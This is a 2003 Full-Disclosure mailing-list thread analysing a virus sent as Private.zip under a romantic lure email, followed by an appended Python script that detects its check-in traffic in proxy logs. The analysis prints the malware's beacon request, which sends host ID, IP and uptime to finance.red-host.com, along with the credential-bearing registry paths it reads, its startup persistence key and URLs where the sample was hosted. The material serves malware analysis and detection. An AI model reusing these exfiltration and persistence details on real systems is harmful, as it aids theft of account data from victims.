Hi,

Look at this line:

    GET /events.php?%s HTTP/1.1
    Accept: */*
    Connection: Keep-Alive
    Host: finance.red-host.com
    id=%s&ip=%s&speed=%d&timeonline=%d
    finance.red-host.com

so imagine this:

    id=[autonumeric]&ip=[internet address by gestaddrbyhost]&speed=[connection speed]&timeonline=[seconds/minutes]

This logs the information about an infected host. Look more:

    /* Written By Adrey Karimov [www.proantivirus.com] */

This can be bogus data, but that boy is from an antivirus-related company! :) (who are the virii authors now?)

    %s0x%02hx%02hx%02hx%02hx%02hx%02hx
    S-%lu-
    %s SC:%s
    %s SW:%i.%i.%i.%i
    %s PW:%i.%i.%i.%i
    %s SD:%i.%i.%i.%i
    %s PD:%i.%i.%i.%i
    %s IP:%i.%i.%i.%i
    %s%s:%s:%s
    [%s]
    DialParamsUID
    %sMicrosoft\Network\Connections\pbk\rasphone.pbk
    %s\
    LdapUnicodeToUTF8

This calls the Microsoft RAS API and inserts the data into a new telephone connection. These functions are called, so the virus uses the memory stack:

    strcat
    strchr  <-*
    strcmp
    strlen
    strncat
    strncpy <-*
    strstr  <-*

And it creates a file with the first data:

    c:\temp35.txt

It keeps there the data found at

    SOFTWARE\Microsoft\Internet Account Manager\Accounts

Other things that the virus does:

    Software\Microsoft\Windows\CurrentVersion\Run
    \sysdeb32.exe
    31337
    c:\tmp.exe

Creates a regkey to run it at startup and it copies itself to some locations. Stores this data ?¿? :

    %-2.2X
    %.8x%.8x
    \svc.sav

I think some info is hardcoded. The presence of sysdeb32.exe and tmp.exe indicates virus activity. I don't know which virus this is. xD

Best regards,
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->\x74\x72\x75\x6c\x75\x78
0x02->The truth is out there,
0x03-> outside your mind .
__________________________________
PGP: Key fingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
\x6e\x73\x72\x67 \x73\x65\x63\x75\x72\x69\x74\x79 \x72\x65\x73\x65\x61\x72\x63\x68
http://www.nsrg-security.com
______________________

----- Original Message -----
From: "Andrew Thomas" <[EMAIL PROTECTED]>
To: "'Full Disclosure'" <[EMAIL PROTECTED]>
Sent: Tuesday, November 25, 2003 9:02 AM
Subject: [Full-Disclosure] New virus

> Hi,
>
> Just to confirm receipt of another email containing the following
> text:
> --snip--
> Hello my dear Mary,
>
> I have been thinking about you all night. I would like to apologize
> for the other night when we made beautiful love and did not use
> condoms. I know this was a mistake and I beg you to forgive me.
>
> I miss you more than anything, please call me Mary, I need you. Do
> you remember when we were having wild sex in my house? I remember
> it all like it was only yesterday. You said that the pictures
> would not come out good, but you were very wrong, they are great.
> I didn't want to show you the pictures at first, but now I think
> it's time for you to see them. Please look in the attachment and
> you will see what I mean.
>
> I love you with all my heart, James.
> --snip--
>
> With attached Private.zip.
>
> A quick strings (after unpacking) on the file gives
> http://afx.alink.co.za/rt.txt
>
> The original archive is available @ http://afx.alink.co.za/Private.zip
>
> I don't have the time to take this apart, but some interesting things
> include a call to function "UrlDownloadToFileA", and a bunch of other
> HTTP-style requests.
>
> Also looks like it may do some kind of speed test and post results
> as well remotely, including IP address of the infected host, as well
> as pulling stuff out like RAS info, pop3 info, etc.
>
> The host that appears to be called is "finance.red-host.com", with a
> call made to the page "showinfo.php", which returns only
> --snip--
> Error 0x7a2e: Invalid query, database search failed.
> --snip--
> without anything appended.
>
> There's quite a bit more in here.
>
> A.
> --
> Andrew G. Thomas
> Hobbs & Associates Chartered Accountants (SA)
> (o) +27-(0)21-683-0500
> (f) +27-(0)21-683-0577
> (m) +27-(0)83-318-4070
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
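As an added example (not part of either message above), a small Python check that recognises the check-in format quoted in the reply (`id=%s&ip=%s&speed=%d&timeonline=%d` sent to `finance.red-host.com/events.php`) in proxy-log lines, so a defender can list the internal hosts that are phoning home. The log format (`timestamp client method url`) and the sample lines are constructed for the example.

```python
from urllib.parse import parse_qs, urlsplit

# Beacon shape taken from the strings quoted in the post:
#   GET /events.php?%s ... Host: finance.red-host.com ; id=%s&ip=%s&speed=%d&timeonline=%d
BEACON_HOST = "finance.red-host.com"
BEACON_PATH = "/events.php"
BEACON_FIELDS = ("id", "ip", "speed", "timeonline")

# Constructed sample proxy log (not real traffic): "timestamp client method url"
SAMPLE_LOG = """\
1069750000.123 10.0.0.5 GET http://finance.red-host.com/events.php?id=17&ip=203.0.113.9&speed=512&timeonline=3600
1069750001.456 10.0.0.6 GET http://www.example.com/index.html
1069750002.789 10.0.0.7 GET http://finance.red-host.com/showinfo.php
1069750003.000 10.0.0.8 GET http://finance.red-host.com/events.php?id=18&ip=203.0.113.10&speed=56&timeonline=120
"""

def parse_beacon(url):
    """Return the check-in fields as a dict if `url` has the beacon shape, else None."""
    parts = urlsplit(url)
    if parts.hostname != BEACON_HOST or parts.path != BEACON_PATH:
        return None
    qs = parse_qs(parts.query)
    if any(f not in qs for f in BEACON_FIELDS):
        return None
    rec = {f: qs[f][0] for f in BEACON_FIELDS}
    # speed and timeonline are %d in the format string, so reject non-numeric values
    try:
        rec["speed"] = int(rec["speed"])
        rec["timeonline"] = int(rec["timeonline"])
    except ValueError:
        return None
    return rec

def find_beacons(log_text):
    """Scan log lines and return one record per matching check-in, tagged with the client."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _method, url = fields[:4]
        rec = parse_beacon(url)
        if rec is not None:
            rec.update(client=client, ts=ts)
            hits.append(rec)
    return hits

def contacted_c2(log_text):  # clients that reached the C2 host at all (showinfo.php included)
    return sorted({ln.split()[1] for ln in log_text.splitlines()
                   if len(ln.split()) >= 4 and urlsplit(ln.split()[3]).hostname == BEACON_HOST})
```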
